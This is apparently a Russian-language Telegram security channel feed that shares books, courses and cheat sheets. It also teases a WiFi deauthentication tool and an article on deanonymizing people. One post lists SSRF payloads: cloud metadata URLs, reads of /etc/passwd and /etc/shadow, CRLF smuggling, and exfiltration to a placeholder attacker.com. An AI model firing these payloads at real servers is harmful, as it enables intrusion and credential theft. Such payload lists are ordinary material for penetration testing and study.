Wifi-deauth – это инструмент DDoS атаки deauth на WiFi сети, который отключает все устройства от целевой сети Wi-Fi (2,4 ГГц и 5 ГГц)
После того, как злоумышленник выбирает целевую точку доступа для атаки, программа:
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍9❤3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥42❤2
C# глазами хакера.zip
14.1 MB
Подробно рассмотрены все аспекты безопасности от теории до реальных реализаций .NET-приложений на языке C#
Перечислены уязвимости, которые могут быть присущи веб-сайтам и Web API, описано, как хакеры могут эксплуатировать уязвимости и как можно обеспечить безопасность приложений
Рассмотрены сетевые функции: проверка соединения, отслеживание запроса, доступ к микросервисам, работа с сокетами и др.
Приведены реальные примеры атак хакеров и способы защиты от них
Автор: Фленов М.
Год выхода: 2022
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍4😈1
Основы_криптографии_и_подстановочные_шифры_zip.003
1.4 GB
В курсе вы научитесь:
Удаляете и открываете как zip; 002 и другие оставляете в той же папке что и тот что открываете
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍3🦄1
List of Ransomware HD.png
643.5 KB
📄 Шпаргалка по Ransomware
Ransomware (вирус-шифровальщик, вирус-вымогатель) – это вредоносная программа, которая при попадании на компьютер атакует важнейшие системные разделы с документами, таблицами, изображениями и пр.
Затем вирус шифрует все файлы этого типа и лишает владельца доступа к ним
Злоумышленники предлагают жертве заплатить деньги за восстановление доступа к данным
✋ Secure Books
Ransomware (вирус-шифровальщик, вирус-вымогатель) – это вредоносная программа, которая при попадании на компьютер атакует важнейшие системные разделы с документами, таблицами, изображениями и пр.
Затем вирус шифрует все файлы этого типа и лишает владельца доступа к ним
Злоумышленники предлагают жертве заплатить деньги за восстановление доступа к данным
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍4❤2👾1
SSRF (Server-Side Request Forgery) – это уязвимость веб-приложения, которая позволяет злоумышленнику отправлять поддельные запросы от имени самого сервера
Пейлоады SSRF представляют собой специально сформированные запросы, которые злоумышленник внедряет в уязвимое веб-приложение
SSRF пейлоады могут включать манипуляции с URL-адресами, использование специальных схем (например, file://, ftp://), эксплойты протокольного smuggling, обращения к метаданным облачных провайдеров и другие техники для достижения своих целей
1. Сканирование внутренней сети
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/computeMetadata/v1/instance/
http://169.254.169.254/metadata/v1/
2. Получение файлов
file:///etc/passwd
file:///etc/shadow
file:///c:/boot.ini
3. Взаимодействие с внешними сервисами
http://attacker.com/?url=http://internal.site.com/
ftp://attacker.com/
4. Протокольный smuggling
http://internal.site.com:80%0d%0aHost: attacker.com%0d%0a
http://internal.site.com:80%23attacker.com
5. Эксфильтрация данных через DNS
http://attacker.com/?url=http://x.x.x.x/
http://attacker.com/?url=http://attacker.com.x.x.x.x.evilsite.com/
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥5❤3
Криптографические_методы_защиты_информации.pdf
9.5 MB
В настоящем пособии рассмотрены только основные математические методы защиты информации, и среди них главный акцент сделан на криптографическую защиту, которая включает:
Кроме того, в пособии рассматриваются типовые уязвимости операционных и информационно вычислительных систем
Авторы: Владимиров С. М.
Габидулин Э. М.
Колыбельников А. И.
Кшевецкий А. С.
Год выхода: 2020
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16❤2🦄2
В статье автор поделиться своим опытом и знаниями о том, как можно раскрыть личность человека в интернете, используя различные техники и программы
Деанонимизация – это процесс, при котором анонимный пользователь или группа пользователей становятся известными по своим реальным данным, таким как имя, адрес, номер телефона, электронная почта и т.д.
Существует множество инструментов и методик для деанонимизации, которые можно разделить на несколько категорий:
В статье подробно рассмотрим каждую из категорий
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥5
Часть 6.zip
1.8 GB
Комплексный курс по взлому веб-сайтов и веб-приложений от Зайда Сабиха, в русской озвучке! Материал подойдёт как для специалистов, так и для начинающих, которые лишь начинают свой путь в тестировании на проникновение и хакинге.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍7
Список потрясающих фреймворков командной строки, наборов инструментов, руководств, шпаргалок, утилит, серверов и других полезных вещей
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥3
40 книг по Linux.7z
796.7 MB
• Командная строка Linux. Полное руководство - 2017
• Ubuntu и Debian Linux для продвинутых - 2011
• Внутреннее устройство Linux - 2016
• Linux на практике - 2017
• UNIX. Профессиональное программирование - 2018
• Linux глазами хакера 2019
• Внутреннее устройство Linux 2017
• Сценарии командной оболочки. Linux, OS X и Unix 2017
• Встраиваемые системы на основе Linux 2017
• Linux API. Исчерпывающее руководство 2018
• Linux. От новичка к профессионалу 2018
• Kali Linux от разработчиков 2019
• Командная строка Linux. Полное руководство 2 изд 2020…
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20🔥7💩2
В сегодняшней статье мы познакомим вас с лучшими утилитами аудита безопасности Linux
Инструмент основан на стандартах CIS и других мировых фреймворках по безопасности
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12
tcpdump HD.png
1.9 MB
📄 Шпаргалка по Tcpdump
Tcpdump – это утилита UNIX, позволяющая перехватывать и анализировать сетевой трафик, проходящий через компьютер, на котором запущена данная программа
Утилита имеет богатый набор опций и различных фильтров, благодаря чему её можно применять для различных целей
✋ Secure Book
Tcpdump – это утилита UNIX, позволяющая перехватывать и анализировать сетевой трафик, проходящий через компьютер, на котором запущена данная программа
Утилита имеет богатый набор опций и различных фильтров, благодаря чему её можно применять для различных целей
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10❤2🔥2
Bash и кибербезопасность.pdf
4.9 MB
Командная строка может стать идеальным инструментом для обеспечения кибербезопасности
Невероятная гибкость и абсолютная доступность превращают стандартный интерфейс командной строки (CLI) в фундаментальное решение, если у вас есть соответствующий опыт
Авторы Пол Тронкон и Карл Олбинг рассказывают об инструментах и хитростях командной строки, помогающих собирать данные при упреждающей защите, анализировать логи и отслеживать состояние сетей
Пентестеры узнают, как проводить атаки, используя колоссальный функционал, встроенный практически в любую версию Linux
Автор: Пол Тронкон, Карл Олбинг
Год выхода: 2020
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16❤4🔥2💅1